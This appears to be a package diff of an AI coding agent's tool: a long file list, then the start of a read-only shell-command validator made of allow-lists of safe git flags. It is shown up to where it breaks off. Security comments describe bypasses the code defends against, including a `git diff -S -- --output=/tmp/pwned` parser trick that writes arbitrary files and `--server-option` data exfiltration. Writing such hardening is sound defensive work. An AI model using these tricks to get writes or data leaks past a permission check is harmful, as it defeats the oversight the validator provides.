- package/src/utils/plugins/pluginInstallationHelpers.ts +595 -0
- package/src/utils/plugins/pluginLoader.ts +3302 -0
- package/src/utils/plugins/pluginOptionsStorage.ts +400 -0
- package/src/utils/plugins/pluginPolicy.ts +20 -0
- package/src/utils/plugins/pluginStartupCheck.ts +341 -0
- package/src/utils/plugins/pluginVersioning.ts +157 -0
- package/src/utils/plugins/reconciler.ts +265 -0
- package/src/utils/plugins/refresh.ts +215 -0
- package/src/utils/plugins/schemas.ts +1681 -0
- package/src/utils/plugins/validatePlugin.ts +903 -0
- package/src/utils/plugins/walkPluginMarkdown.ts +69 -0
- package/src/utils/plugins/zipCache.ts +406 -0
- package/src/utils/plugins/zipCacheAdapters.ts +164 -0
- package/src/utils/powershell/dangerousCmdlets.ts +185 -0
- package/src/utils/powershell/parser.ts +1804 -0
- package/src/utils/powershell/staticPrefix.ts +316 -0
- package/src/utils/preflightChecks.tsx +151 -0
- package/src/utils/privacyLevel.ts +55 -0
- package/src/utils/process.ts +68 -0
- package/src/utils/processUserInput/processBashCommand.tsx +140 -0
- package/src/utils/processUserInput/processSlashCommand.tsx +922 -0
- package/src/utils/processUserInput/processTextPrompt.ts +100 -0
- package/src/utils/processUserInput/processUserInput.ts +605 -0
- package/src/utils/profilerBase.ts +46 -0
- package/src/utils/promptCategory.ts +49 -0
- package/src/utils/promptEditor.ts +188 -0
- package/src/utils/promptShellExecution.ts +183 -0
- package/src/utils/proxy.ts +426 -0
- package/src/utils/queryContext.ts +179 -0
- package/src/utils/queryHelpers.ts +552 -0
- package/src/utils/queryProfiler.ts +301 -0
- package/src/utils/queueProcessor.ts +95 -0
- package/src/utils/readEditContext.ts +227 -0
- package/src/utils/readFileInRange.ts +383 -0
- package/src/utils/releaseNotes.ts +360 -0
- package/src/utils/renderOptions.ts +77 -0
- package/src/utils/ripgrep.ts +679 -0
- package/src/utils/sandbox/sandbox-adapter.ts +985 -0
- package/src/utils/sandbox/sandbox-ui-utils.ts +12 -0
- package/src/utils/sanitization.ts +91 -0
- package/src/utils/screenshotClipboard.ts +121 -0
- package/src/utils/sdkEventQueue.ts +134 -0
- package/src/utils/secureStorage/fallbackStorage.ts +70 -0
- package/src/utils/secureStorage/index.ts +17 -0
- package/src/utils/secureStorage/keychainPrefetch.ts +116 -0
- package/src/utils/secureStorage/macOsKeychainHelpers.ts +111 -0
- package/src/utils/secureStorage/macOsKeychainStorage.ts +231 -0
- package/src/utils/secureStorage/plainTextStorage.ts +84 -0
- package/src/utils/semanticBoolean.ts +29 -0
- package/src/utils/semanticNumber.ts +36 -0
- package/src/utils/semver.ts +59 -0
- package/src/utils/sequential.ts +56 -0
- package/src/utils/sessionActivity.ts +133 -0
- package/src/utils/sessionEnvVars.ts +22 -0
- package/src/utils/sessionEnvironment.ts +166 -0
- package/src/utils/sessionFileAccessHooks.ts +250 -0
- package/src/utils/sessionIngressAuth.ts +140 -0
- package/src/utils/sessionRestore.ts +551 -0
- package/src/utils/sessionStart.ts +232 -0
- package/src/utils/sessionState.ts +150 -0
- package/src/utils/sessionStorage.ts +5105 -0
- package/src/utils/sessionStoragePortable.ts +793 -0
- package/src/utils/sessionTitle.ts +129 -0
- package/src/utils/sessionUrl.ts +64 -0
- package/src/utils/set.ts +53 -0
- package/src/utils/settings/allErrors.ts +32 -0
- package/src/utils/settings/applySettingsChange.ts +92 -0
- package/src/utils/settings/changeDetector.ts +488 -0
- package/src/utils/settings/constants.ts +202 -0
- package/src/utils/settings/internalWrites.ts +37 -0
- package/src/utils/settings/managedPath.ts +34 -0
- package/src/utils/settings/mdm/constants.ts +81 -0
- package/src/utils/settings/mdm/rawRead.ts +130 -0
- package/src/utils/settings/mdm/settings.ts +316 -0
- package/src/utils/settings/permissionValidation.ts +262 -0
- package/src/utils/settings/pluginOnlyPolicy.ts +60 -0
- package/src/utils/settings/schemaOutput.ts +8 -0
- package/src/utils/settings/settings.ts +1015 -0
- package/src/utils/settings/settingsCache.ts +80 -0
- package/src/utils/settings/toolValidationConfig.ts +103 -0
- package/src/utils/settings/types.ts +1148 -0
- package/src/utils/settings/validateEditTool.ts +45 -0
- package/src/utils/settings/validation.ts +265 -0
- package/src/utils/settings/validationTips.ts +164 -0
- package/src/utils/shell/bashProvider.ts +255 -0
- package/src/utils/shell/outputLimits.ts +14 -0
- package/src/utils/shell/powershellDetection.ts +107 -0
- package/src/utils/shell/powershellProvider.ts +123 -0
- package/src/utils/shell/prefix.ts +367 -0
- package/src/utils/shell/readOnlyCommandValidation.ts +1893 -0
- package/src/utils/shell/resolveDefaultShell.ts +14 -0
- package/src/utils/shell/shellProvider.ts +33 -0
- package/src/utils/shell/shellToolUtils.ts +22 -0
- package/src/utils/shell/specPrefix.ts +241 -0
- package/src/utils/shellConfig.ts +167 -0
- package/src/utils/sideQuery.ts +222 -0
- package/src/utils/sideQuestion.ts +155 -0
- package/src/utils/signal.ts +43 -0
- package/src/utils/sinks.ts +16 -0
- package/src/utils/skills/skillChangeDetector.ts +311 -0
- package/src/utils/slashCommandParsing.ts +60 -0
- package/src/utils/sleep.ts +84 -0
- package/src/utils/sliceAnsi.ts +91 -0
- package/src/utils/slowOperations.ts +286 -0
- package/src/utils/standaloneAgent.ts +23 -0
- package/src/utils/startupProfiler.ts +194 -0
- package/src/utils/staticRender.tsx +116 -0
- package/src/utils/stats.ts +1061 -0
- package/src/utils/statsCache.ts +434 -0
- package/src/utils/status.tsx +362 -0
- package/src/utils/statusNoticeDefinitions.tsx +198 -0
- package/src/utils/statusNoticeHelpers.ts +20 -0
- package/src/utils/stream.ts +76 -0
- package/src/utils/streamJsonStdoutGuard.ts +123 -0
- package/src/utils/streamlinedTransform.ts +201 -0
- package/src/utils/stringUtils.ts +235 -0
- package/src/utils/subprocessEnv.ts +99 -0
- package/src/utils/suggestions/commandSuggestions.ts +567 -0
- package/src/utils/suggestions/directoryCompletion.ts +263 -0
- package/src/utils/suggestions/shellHistoryCompletion.ts +119 -0
- package/src/utils/suggestions/skillUsageTracking.ts +55 -0
- package/src/utils/suggestions/slackChannelSuggestions.ts +209 -0
- package/src/utils/swarm/It2SetupPrompt.tsx +380 -0
- package/src/utils/swarm/backends/ITermBackend.ts +370 -0
- package/src/utils/swarm/backends/InProcessBackend.ts +339 -0
- package/src/utils/swarm/backends/PaneBackendExecutor.ts +354 -0
- package/src/utils/swarm/backends/TmuxBackend.ts +764 -0
- package/src/utils/swarm/backends/detection.ts +128 -0
- package/src/utils/swarm/backends/it2Setup.ts +245 -0
- package/src/utils/swarm/backends/registry.ts +464 -0
- package/src/utils/swarm/backends/teammateModeSnapshot.ts +87 -0
- package/src/utils/swarm/backends/types.ts +311 -0
- package/src/utils/swarm/constants.ts +33 -0
- package/src/utils/swarm/inProcessRunner.ts +1552 -0
- package/src/utils/swarm/leaderPermissionBridge.ts +54 -0
- package/src/utils/swarm/permissionSync.ts +928 -0
- package/src/utils/swarm/reconnection.ts +119 -0
- package/src/utils/swarm/spawnInProcess.ts +328 -0
- package/src/utils/swarm/spawnUtils.ts +146 -0
- package/src/utils/swarm/teamHelpers.ts +683 -0
- package/src/utils/swarm/teammateInit.ts +129 -0
- package/src/utils/swarm/teammateLayoutManager.ts +107 -0
- package/src/utils/swarm/teammateModel.ts +10 -0
- package/src/utils/swarm/teammatePromptAddendum.ts +18 -0
- package/src/utils/systemDirectories.ts +74 -0
- package/src/utils/systemPrompt.ts +123 -0
- package/src/utils/systemPromptType.ts +14 -0
- package/src/utils/systemTheme.ts +119 -0
- package/src/utils/taggedId.ts +54 -0
- package/src/utils/task/TaskOutput.ts +390 -0
- package/src/utils/task/diskOutput.ts +451 -0
- package/src/utils/task/framework.ts +308 -0
- package/src/utils/task/outputFormatting.ts +38 -0
- package/src/utils/task/sdkProgress.ts +36 -0
- package/src/utils/tasks.ts +862 -0
- package/src/utils/teamDiscovery.ts +81 -0
- package/src/utils/teamMemoryOps.ts +88 -0
- package/src/utils/teammate.ts +292 -0
- package/src/utils/teammateContext.ts +96 -0
- package/src/utils/teammateMailbox.ts +1183 -0
- package/src/utils/telemetry/betaSessionTracing.ts +491 -0
- package/src/utils/telemetry/bigqueryExporter.ts +252 -0
- package/src/utils/telemetry/events.ts +75 -0
- package/src/utils/telemetry/instrumentation.ts +825 -0
- package/src/utils/telemetry/logger.ts +26 -0
- package/src/utils/telemetry/perfettoTracing.ts +1120 -0
- package/src/utils/telemetry/pluginTelemetry.ts +289 -0
- package/src/utils/telemetry/sessionTracing.ts +927 -0
- package/src/utils/telemetry/skillLoadedEvent.ts +39 -0
- package/src/utils/telemetryAttributes.ts +71 -0
- package/src/utils/teleport/api.ts +466 -0
- package/src/utils/teleport/environmentSelection.ts +77 -0
- package/src/utils/teleport/environments.ts +120 -0
- package/src/utils/teleport/gitBundle.ts +292 -0
- package/src/utils/teleport.tsx +1226 -0
- package/src/utils/tempfile.ts +31 -0
- package/src/utils/terminal.ts +131 -0
- package/src/utils/terminalPanel.ts +191 -0
- package/src/utils/textHighlighting.ts +166 -0
- package/src/utils/theme.ts +639 -0
- package/src/utils/thinking.ts +162 -0
- package/src/utils/timeouts.ts +39 -0
- package/src/utils/tmuxSocket.ts +427 -0
- package/src/utils/todo/types.ts +18 -0
- package/src/utils/tokenBudget.ts +73 -0
- package/src/utils/tokens.ts +261 -0
- package/src/utils/toolErrors.ts +132 -0
- package/src/utils/toolPool.ts +79 -0
- package/src/utils/toolResultStorage.ts +1040 -0
- package/src/utils/toolSchemaCache.ts +26 -0
- package/src/utils/toolSearch.ts +756 -0
- package/src/utils/transcriptSearch.ts +202 -0
- package/src/utils/treeify.ts +170 -0
- package/src/utils/truncate.ts +179 -0
- package/src/utils/ultraplan/ccrSession.ts +349 -0
- package/src/utils/ultraplan/keyword.ts +127 -0
- package/src/utils/ultraplan/prompt.txt +1 -0
- package/src/utils/unaryLogging.ts +39 -0
- package/src/utils/undercover.ts +89 -0
- package/src/utils/user.ts +194 -0
- package/src/utils/userAgent.ts +10 -0
- package/src/utils/userPromptKeywords.ts +27 -0
- package/src/utils/uuid.ts +27 -0
- package/src/utils/warningHandler.ts +121 -0
- package/src/utils/which.ts +82 -0
- package/src/utils/windowsPaths.ts +173 -0
- package/src/utils/withResolvers.ts +13 -0
- package/src/utils/words.ts +800 -0
- package/src/utils/workloadContext.ts +57 -0
- package/src/utils/worktree.ts +1519 -0
- package/src/utils/worktreeModeEnabled.ts +11 -0
- package/src/utils/xdg.ts +65 -0
- package/src/utils/xml.ts +16 -0
- package/src/utils/yaml.ts +15 -0
- package/src/utils/zodToJsonSchema.ts +23 -0
- package/src/vim/motions.ts +82 -0
- package/src/vim/operators.ts +556 -0
- package/src/vim/textObjects.ts +186 -0
- package/src/vim/transitions.ts +490 -0
- package/src/vim/types.ts +199 -0
- package/src/voice/voiceModeEnabled.ts +54 -0
- package/start.js +1 -0
|
@@ -0,0 +1,1893 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* Shared command validation maps for shell tools (BashTool, PowerShellTool, etc.).
|
|
3
|
+
*
|
|
4
|
+
* Exports complete command configuration maps that any shell tool can import:
|
|
5
|
+
* - GIT_READ_ONLY_COMMANDS: all git subcommands with safe flags and callbacks
|
|
6
|
+
* - GH_READ_ONLY_COMMANDS: ant-only gh CLI commands (network-dependent)
|
|
7
|
+
* - EXTERNAL_READONLY_COMMANDS: cross-shell commands that work in both bash and PowerShell
|
|
8
|
+
* - containsVulnerableUncPath: UNC path detection for credential leak prevention
|
|
9
|
+
* - outputLimits are in outputLimits.ts
|
|
10
|
+
*/
|
|
11
|
+
|
|
12
|
+
import { getPlatform } from '../platform.js'
|
|
13
|
+
|
|
14
|
+
// ---------------------------------------------------------------------------
|
|
15
|
+
// Types
|
|
16
|
+
// ---------------------------------------------------------------------------
|
|
17
|
+
|
|
18
|
+
export type FlagArgType =
|
|
19
|
+
| 'none' // No argument (--color, -n)
|
|
20
|
+
| 'number' // Integer argument (--context=3)
|
|
21
|
+
| 'string' // Any string argument (--relative=path)
|
|
22
|
+
| 'char' // Single character (delimiter)
|
|
23
|
+
| '{}' // Literal "{}" only
|
|
24
|
+
| 'EOF' // Literal "EOF" only
|
|
25
|
+
|
|
26
|
+
export type ExternalCommandConfig = {
|
|
27
|
+
safeFlags: Record<string, FlagArgType>
|
|
28
|
+
// Returns true if the command is dangerous, false if safe.
|
|
29
|
+
// args is the list of tokens AFTER the command name (e.g., after "git branch").
|
|
30
|
+
additionalCommandIsDangerousCallback?: (
|
|
31
|
+
rawCommand: string,
|
|
32
|
+
args: string[],
|
|
33
|
+
) => boolean
|
|
34
|
+
// When false, the tool does NOT respect POSIX `--` end-of-options.
|
|
35
|
+
// validateFlags will continue checking flags after `--` instead of breaking.
|
|
36
|
+
// Default: true (most tools respect `--`).
|
|
37
|
+
respectsDoubleDash?: boolean
|
|
38
|
+
}
|
|
39
|
+
|
|
40
|
+
// ---------------------------------------------------------------------------
|
|
41
|
+
// Shared git flag groups
|
|
42
|
+
// ---------------------------------------------------------------------------
|
|
43
|
+
|
|
44
|
+
const GIT_REF_SELECTION_FLAGS: Record<string, FlagArgType> = {
|
|
45
|
+
'--all': 'none',
|
|
46
|
+
'--branches': 'none',
|
|
47
|
+
'--tags': 'none',
|
|
48
|
+
'--remotes': 'none',
|
|
49
|
+
}
|
|
50
|
+
|
|
51
|
+
const GIT_DATE_FILTER_FLAGS: Record<string, FlagArgType> = {
|
|
52
|
+
'--since': 'string',
|
|
53
|
+
'--after': 'string',
|
|
54
|
+
'--until': 'string',
|
|
55
|
+
'--before': 'string',
|
|
56
|
+
}
|
|
57
|
+
|
|
58
|
+
const GIT_LOG_DISPLAY_FLAGS: Record<string, FlagArgType> = {
|
|
59
|
+
'--oneline': 'none',
|
|
60
|
+
'--graph': 'none',
|
|
61
|
+
'--decorate': 'none',
|
|
62
|
+
'--no-decorate': 'none',
|
|
63
|
+
'--date': 'string',
|
|
64
|
+
'--relative-date': 'none',
|
|
65
|
+
}
|
|
66
|
+
|
|
67
|
+
const GIT_COUNT_FLAGS: Record<string, FlagArgType> = {
|
|
68
|
+
'--max-count': 'number',
|
|
69
|
+
'-n': 'number',
|
|
70
|
+
}
|
|
71
|
+
|
|
72
|
+
// Stat output flags - used in git log, show, diff
|
|
73
|
+
const GIT_STAT_FLAGS: Record<string, FlagArgType> = {
|
|
74
|
+
'--stat': 'none',
|
|
75
|
+
'--numstat': 'none',
|
|
76
|
+
'--shortstat': 'none',
|
|
77
|
+
'--name-only': 'none',
|
|
78
|
+
'--name-status': 'none',
|
|
79
|
+
}
|
|
80
|
+
|
|
81
|
+
// Color output flags - used in git log, show, diff
|
|
82
|
+
const GIT_COLOR_FLAGS: Record<string, FlagArgType> = {
|
|
83
|
+
'--color': 'none',
|
|
84
|
+
'--no-color': 'none',
|
|
85
|
+
}
|
|
86
|
+
|
|
87
|
+
// Patch display flags - used in git log, show
|
|
88
|
+
const GIT_PATCH_FLAGS: Record<string, FlagArgType> = {
|
|
89
|
+
'--patch': 'none',
|
|
90
|
+
'-p': 'none',
|
|
91
|
+
'--no-patch': 'none',
|
|
92
|
+
'--no-ext-diff': 'none',
|
|
93
|
+
'-s': 'none',
|
|
94
|
+
}
|
|
95
|
+
|
|
96
|
+
// Author/committer filter flags - used in git log, reflog
|
|
97
|
+
const GIT_AUTHOR_FILTER_FLAGS: Record<string, FlagArgType> = {
|
|
98
|
+
'--author': 'string',
|
|
99
|
+
'--committer': 'string',
|
|
100
|
+
'--grep': 'string',
|
|
101
|
+
}
|
|
102
|
+
|
|
103
|
+
// ---------------------------------------------------------------------------
|
|
104
|
+
// GIT_READ_ONLY_COMMANDS — complete map of all git subcommands
|
|
105
|
+
// ---------------------------------------------------------------------------
|
|
106
|
+
|
|
107
|
+
export const GIT_READ_ONLY_COMMANDS: Record<string, ExternalCommandConfig> = {
|
|
108
|
+
'git diff': {
|
|
109
|
+
safeFlags: {
|
|
110
|
+
...GIT_STAT_FLAGS,
|
|
111
|
+
...GIT_COLOR_FLAGS,
|
|
112
|
+
// Display and comparison flags
|
|
113
|
+
'--dirstat': 'none',
|
|
114
|
+
'--summary': 'none',
|
|
115
|
+
'--patch-with-stat': 'none',
|
|
116
|
+
'--word-diff': 'none',
|
|
117
|
+
'--word-diff-regex': 'string',
|
|
118
|
+
'--color-words': 'none',
|
|
119
|
+
'--no-renames': 'none',
|
|
120
|
+
'--no-ext-diff': 'none',
|
|
121
|
+
'--check': 'none',
|
|
122
|
+
'--ws-error-highlight': 'string',
|
|
123
|
+
'--full-index': 'none',
|
|
124
|
+
'--binary': 'none',
|
|
125
|
+
'--abbrev': 'number',
|
|
126
|
+
'--break-rewrites': 'none',
|
|
127
|
+
'--find-renames': 'none',
|
|
128
|
+
'--find-copies': 'none',
|
|
129
|
+
'--find-copies-harder': 'none',
|
|
130
|
+
'--irreversible-delete': 'none',
|
|
131
|
+
'--diff-algorithm': 'string',
|
|
132
|
+
'--histogram': 'none',
|
|
133
|
+
'--patience': 'none',
|
|
134
|
+
'--minimal': 'none',
|
|
135
|
+
'--ignore-space-at-eol': 'none',
|
|
136
|
+
'--ignore-space-change': 'none',
|
|
137
|
+
'--ignore-all-space': 'none',
|
|
138
|
+
'--ignore-blank-lines': 'none',
|
|
139
|
+
'--inter-hunk-context': 'number',
|
|
140
|
+
'--function-context': 'none',
|
|
141
|
+
'--exit-code': 'none',
|
|
142
|
+
'--quiet': 'none',
|
|
143
|
+
'--cached': 'none',
|
|
144
|
+
'--staged': 'none',
|
|
145
|
+
'--pickaxe-regex': 'none',
|
|
146
|
+
'--pickaxe-all': 'none',
|
|
147
|
+
'--no-index': 'none',
|
|
148
|
+
'--relative': 'string',
|
|
149
|
+
// Diff filtering
|
|
150
|
+
'--diff-filter': 'string',
|
|
151
|
+
// Short flags
|
|
152
|
+
'-p': 'none',
|
|
153
|
+
'-u': 'none',
|
|
154
|
+
'-s': 'none',
|
|
155
|
+
'-M': 'none',
|
|
156
|
+
'-C': 'none',
|
|
157
|
+
'-B': 'none',
|
|
158
|
+
'-D': 'none',
|
|
159
|
+
'-l': 'none',
|
|
160
|
+
// SECURITY: -S/-G/-O take REQUIRED string arguments (pickaxe search,
|
|
161
|
+
// pickaxe regex, orderfile). Previously 'none' caused a parser
|
|
162
|
+
// differential with git: `git diff -S -- --output=/tmp/pwned` —
|
|
163
|
+
// validator sees -S as no-arg → advances 1 token → breaks on `--` →
|
|
164
|
+
// --output unchecked. git sees -S requires arg → consumes `--` as the
|
|
165
|
+
// pickaxe string (standard getopt: required-arg options consume next
|
|
166
|
+
// argv unconditionally, BEFORE the top-level `--` check) → cursor at
|
|
167
|
+
// --output=... → parses as long option → ARBITRARY FILE WRITE.
|
|
168
|
+
// git log config at line ~207 correctly has -S/-G as 'string'.
|
|
169
|
+
'-S': 'string',
|
|
170
|
+
'-G': 'string',
|
|
171
|
+
'-O': 'string',
|
|
172
|
+
'-R': 'none',
|
|
173
|
+
},
|
|
174
|
+
},
|
|
175
|
+
'git log': {
|
|
176
|
+
safeFlags: {
|
|
177
|
+
...GIT_LOG_DISPLAY_FLAGS,
|
|
178
|
+
...GIT_REF_SELECTION_FLAGS,
|
|
179
|
+
...GIT_DATE_FILTER_FLAGS,
|
|
180
|
+
...GIT_COUNT_FLAGS,
|
|
181
|
+
...GIT_STAT_FLAGS,
|
|
182
|
+
...GIT_COLOR_FLAGS,
|
|
183
|
+
...GIT_PATCH_FLAGS,
|
|
184
|
+
...GIT_AUTHOR_FILTER_FLAGS,
|
|
185
|
+
// Additional display flags
|
|
186
|
+
'--abbrev-commit': 'none',
|
|
187
|
+
'--full-history': 'none',
|
|
188
|
+
'--dense': 'none',
|
|
189
|
+
'--sparse': 'none',
|
|
190
|
+
'--simplify-merges': 'none',
|
|
191
|
+
'--ancestry-path': 'none',
|
|
192
|
+
'--source': 'none',
|
|
193
|
+
'--first-parent': 'none',
|
|
194
|
+
'--merges': 'none',
|
|
195
|
+
'--no-merges': 'none',
|
|
196
|
+
'--reverse': 'none',
|
|
197
|
+
'--walk-reflogs': 'none',
|
|
198
|
+
'--skip': 'number',
|
|
199
|
+
'--max-age': 'number',
|
|
200
|
+
'--min-age': 'number',
|
|
201
|
+
'--no-min-parents': 'none',
|
|
202
|
+
'--no-max-parents': 'none',
|
|
203
|
+
'--follow': 'none',
|
|
204
|
+
// Commit traversal flags
|
|
205
|
+
'--no-walk': 'none',
|
|
206
|
+
'--left-right': 'none',
|
|
207
|
+
'--cherry-mark': 'none',
|
|
208
|
+
'--cherry-pick': 'none',
|
|
209
|
+
'--boundary': 'none',
|
|
210
|
+
// Ordering flags
|
|
211
|
+
'--topo-order': 'none',
|
|
212
|
+
'--date-order': 'none',
|
|
213
|
+
'--author-date-order': 'none',
|
|
214
|
+
// Format control
|
|
215
|
+
'--pretty': 'string',
|
|
216
|
+
'--format': 'string',
|
|
217
|
+
// Diff filtering
|
|
218
|
+
'--diff-filter': 'string',
|
|
219
|
+
// Pickaxe search (find commits that add/remove string)
|
|
220
|
+
'-S': 'string',
|
|
221
|
+
'-G': 'string',
|
|
222
|
+
'--pickaxe-regex': 'none',
|
|
223
|
+
'--pickaxe-all': 'none',
|
|
224
|
+
},
|
|
225
|
+
},
|
|
226
|
+
'git show': {
|
|
227
|
+
safeFlags: {
|
|
228
|
+
...GIT_LOG_DISPLAY_FLAGS,
|
|
229
|
+
...GIT_STAT_FLAGS,
|
|
230
|
+
...GIT_COLOR_FLAGS,
|
|
231
|
+
...GIT_PATCH_FLAGS,
|
|
232
|
+
// Additional display flags
|
|
233
|
+
'--abbrev-commit': 'none',
|
|
234
|
+
'--word-diff': 'none',
|
|
235
|
+
'--word-diff-regex': 'string',
|
|
236
|
+
'--color-words': 'none',
|
|
237
|
+
'--pretty': 'string',
|
|
238
|
+
'--format': 'string',
|
|
239
|
+
'--first-parent': 'none',
|
|
240
|
+
'--raw': 'none',
|
|
241
|
+
// Diff filtering
|
|
242
|
+
'--diff-filter': 'string',
|
|
243
|
+
// Short flags
|
|
244
|
+
'-m': 'none',
|
|
245
|
+
'--quiet': 'none',
|
|
246
|
+
},
|
|
247
|
+
},
|
|
248
|
+
'git shortlog': {
|
|
249
|
+
safeFlags: {
|
|
250
|
+
...GIT_REF_SELECTION_FLAGS,
|
|
251
|
+
...GIT_DATE_FILTER_FLAGS,
|
|
252
|
+
// Summary options
|
|
253
|
+
'-s': 'none',
|
|
254
|
+
'--summary': 'none',
|
|
255
|
+
'-n': 'none',
|
|
256
|
+
'--numbered': 'none',
|
|
257
|
+
'-e': 'none',
|
|
258
|
+
'--email': 'none',
|
|
259
|
+
'-c': 'none',
|
|
260
|
+
'--committer': 'none',
|
|
261
|
+
// Grouping
|
|
262
|
+
'--group': 'string',
|
|
263
|
+
// Formatting
|
|
264
|
+
'--format': 'string',
|
|
265
|
+
// Filtering
|
|
266
|
+
'--no-merges': 'none',
|
|
267
|
+
'--author': 'string',
|
|
268
|
+
},
|
|
269
|
+
},
|
|
270
|
+
'git reflog': {
|
|
271
|
+
safeFlags: {
|
|
272
|
+
...GIT_LOG_DISPLAY_FLAGS,
|
|
273
|
+
...GIT_REF_SELECTION_FLAGS,
|
|
274
|
+
...GIT_DATE_FILTER_FLAGS,
|
|
275
|
+
...GIT_COUNT_FLAGS,
|
|
276
|
+
...GIT_AUTHOR_FILTER_FLAGS,
|
|
277
|
+
},
|
|
278
|
+
// SECURITY: Block `git reflog expire` (positional subcommand) — it writes
|
|
279
|
+
// to .git/logs/** by expiring reflog entries. `git reflog delete` similarly
|
|
280
|
+
// writes. Only `git reflog` (bare = show) and `git reflog show` are safe.
|
|
281
|
+
// The positional-arg fallthrough at ~:1730 would otherwise accept `expire`
|
|
282
|
+
// as a non-flag arg, and `--all` is in GIT_REF_SELECTION_FLAGS → passes.
|
|
283
|
+
additionalCommandIsDangerousCallback: (
|
|
284
|
+
_rawCommand: string,
|
|
285
|
+
args: string[],
|
|
286
|
+
) => {
|
|
287
|
+
// Block known write-capable subcommands: expire, delete, exists.
|
|
288
|
+
// Allow: `show`, ref names (HEAD, refs/*, branch names).
|
|
289
|
+
// The subcommand (if any) is the first positional arg. Subsequent
|
|
290
|
+
// positionals after `show` or after flags are ref names (safe).
|
|
291
|
+
const DANGEROUS_SUBCOMMANDS = new Set(['expire', 'delete', 'exists'])
|
|
292
|
+
for (const token of args) {
|
|
293
|
+
if (!token || token.startsWith('-')) continue
|
|
294
|
+
// First non-flag positional: check if it's a dangerous subcommand.
|
|
295
|
+
// If it's `show` or a ref name like `HEAD`/`refs/...`, safe.
|
|
296
|
+
if (DANGEROUS_SUBCOMMANDS.has(token)) {
|
|
297
|
+
return true // Dangerous subcommand — writes to .git/logs/**
|
|
298
|
+
}
|
|
299
|
+
// First positional is safe (show/HEAD/ref) — subsequent are ref args
|
|
300
|
+
return false
|
|
301
|
+
}
|
|
302
|
+
return false // No positional = bare `git reflog` = safe (shows reflog)
|
|
303
|
+
},
|
|
304
|
+
},
|
|
305
|
+
'git stash list': {
|
|
306
|
+
safeFlags: {
|
|
307
|
+
...GIT_LOG_DISPLAY_FLAGS,
|
|
308
|
+
...GIT_REF_SELECTION_FLAGS,
|
|
309
|
+
...GIT_COUNT_FLAGS,
|
|
310
|
+
},
|
|
311
|
+
},
|
|
312
|
+
'git ls-remote': {
|
|
313
|
+
safeFlags: {
|
|
314
|
+
// Branch/tag filtering flags
|
|
315
|
+
'--branches': 'none',
|
|
316
|
+
'-b': 'none',
|
|
317
|
+
'--tags': 'none',
|
|
318
|
+
'-t': 'none',
|
|
319
|
+
'--heads': 'none',
|
|
320
|
+
'-h': 'none',
|
|
321
|
+
'--refs': 'none',
|
|
322
|
+
// Output control flags
|
|
323
|
+
'--quiet': 'none',
|
|
324
|
+
'-q': 'none',
|
|
325
|
+
'--exit-code': 'none',
|
|
326
|
+
'--get-url': 'none',
|
|
327
|
+
'--symref': 'none',
|
|
328
|
+
// Sorting flags
|
|
329
|
+
'--sort': 'string',
|
|
330
|
+
// Protocol flags
|
|
331
|
+
// SECURITY: --server-option and -o are INTENTIONALLY EXCLUDED. They
|
|
332
|
+
// transmit an arbitrary attacker-controlled string to the remote git
|
|
333
|
+
// server in the protocol v2 capability advertisement. This is a network
|
|
334
|
+
// WRITE primitive (sending data to remote) on what is supposed to be a
|
|
335
|
+
// read-only command. Even without command substitution (which is caught
|
|
336
|
+
// elsewhere), `--server-option="sensitive-data"` exfiltrates the value
|
|
337
|
+
// to whatever `origin` points to. The read-only path should never enable
|
|
338
|
+
// network writes.
|
|
339
|
+
},
|
|
340
|
+
},
|
|
341
|
+
'git status': {
|
|
342
|
+
safeFlags: {
|
|
343
|
+
// Output format flags
|
|
344
|
+
'--short': 'none',
|
|
345
|
+
'-s': 'none',
|
|
346
|
+
'--branch': 'none',
|
|
347
|
+
'-b': 'none',
|
|
348
|
+
'--porcelain': 'none',
|
|
349
|
+
'--long': 'none',
|
|
350
|
+
'--verbose': 'none',
|
|
351
|
+
'-v': 'none',
|
|
352
|
+
// Untracked files handling
|
|
353
|
+
'--untracked-files': 'string',
|
|
354
|
+
'-u': 'string',
|
|
355
|
+
// Ignore options
|
|
356
|
+
'--ignored': 'none',
|
|
357
|
+
'--ignore-submodules': 'string',
|
|
358
|
+
// Column display
|
|
359
|
+
'--column': 'none',
|
|
360
|
+
'--no-column': 'none',
|
|
361
|
+
// Ahead/behind info
|
|
362
|
+
'--ahead-behind': 'none',
|
|
363
|
+
'--no-ahead-behind': 'none',
|
|
364
|
+
// Rename detection
|
|
365
|
+
'--renames': 'none',
|
|
366
|
+
'--no-renames': 'none',
|
|
367
|
+
'--find-renames': 'string',
|
|
368
|
+
'-M': 'string',
|
|
369
|
+
},
|
|
370
|
+
},
|
|
371
|
+
'git blame': {
|
|
372
|
+
safeFlags: {
|
|
373
|
+
...GIT_COLOR_FLAGS,
|
|
374
|
+
// Line range
|
|
375
|
+
'-L': 'string',
|
|
376
|
+
// Output format
|
|
377
|
+
'--porcelain': 'none',
|
|
378
|
+
'-p': 'none',
|
|
379
|
+
'--line-porcelain': 'none',
|
|
380
|
+
'--incremental': 'none',
|
|
381
|
+
'--root': 'none',
|
|
382
|
+
'--show-stats': 'none',
|
|
383
|
+
'--show-name': 'none',
|
|
384
|
+
'--show-number': 'none',
|
|
385
|
+
'-n': 'none',
|
|
386
|
+
'--show-email': 'none',
|
|
387
|
+
'-e': 'none',
|
|
388
|
+
'-f': 'none',
|
|
389
|
+
// Date formatting
|
|
390
|
+
'--date': 'string',
|
|
391
|
+
// Ignore whitespace
|
|
392
|
+
'-w': 'none',
|
|
393
|
+
// Ignore revisions
|
|
394
|
+
'--ignore-rev': 'string',
|
|
395
|
+
'--ignore-revs-file': 'string',
|
|
396
|
+
// Move/copy detection
|
|
397
|
+
'-M': 'none',
|
|
398
|
+
'-C': 'none',
|
|
399
|
+
'--score-debug': 'none',
|
|
400
|
+
// Abbreviation
|
|
401
|
+
'--abbrev': 'number',
|
|
402
|
+
// Other options
|
|
403
|
+
'-s': 'none',
|
|
404
|
+
'-l': 'none',
|
|
405
|
+
'-t': 'none',
|
|
406
|
+
},
|
|
407
|
+
},
|
|
408
|
+
'git ls-files': {
|
|
409
|
+
safeFlags: {
|
|
410
|
+
// File selection
|
|
411
|
+
'--cached': 'none',
|
|
412
|
+
'-c': 'none',
|
|
413
|
+
'--deleted': 'none',
|
|
414
|
+
'-d': 'none',
|
|
415
|
+
'--modified': 'none',
|
|
416
|
+
'-m': 'none',
|
|
417
|
+
'--others': 'none',
|
|
418
|
+
'-o': 'none',
|
|
419
|
+
'--ignored': 'none',
|
|
420
|
+
'-i': 'none',
|
|
421
|
+
'--stage': 'none',
|
|
422
|
+
